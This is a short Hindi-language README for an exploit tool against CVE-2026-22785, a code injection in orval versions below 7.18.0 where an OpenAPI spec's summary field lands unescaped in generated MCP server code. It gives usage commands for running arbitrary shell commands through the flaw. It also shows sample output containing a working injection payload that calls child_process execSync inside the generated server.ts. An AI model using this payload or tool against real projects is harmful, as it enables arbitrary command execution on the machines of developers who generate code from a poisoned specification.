
CVE-2026-22785 के लिए शोषण उपकरण, orval < 7.18.0 में एक गंभीर कोड इंजेक्शन। भेद्यता प्रदर्शित करने और पेलोड इंजेक्शन सत्यापित करने के लिए शेल कमांड निष्पादन और फ़ाइल स्कैनिंग प्रदान करता है।
orval < 7.18.0 MCP सर्वर कोड उत्पन्न करते समय OpenAPI विनिर्देश के summary फ़ील्ड को सीधे टेम्पलेट में जोड़ता है, बिना एस्केपिंग के, जिससे कोड इंजेक्शन होता है।
cd exploit
npm install
# कमांड निष्पादित करें (भेद्यता शोषण)
python cve_tool.py shell <कमांड>
# उदाहरण
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir
# फ़ाइल स्कैन करें
python cve_tool.py scan <फ़ाइल>
<कमांड आउटपुट>
[+] CVE-2026-22785: Payload इंजेक्शन सफल
[+] इंजेक्शन स्थान: server.ts:31
server.ts जनरेटेड कोड:
server.tool(
'getApiDemo',
'API.' + require('child_process').execSync('whoami', {}),//',
getApiDemoHandler
);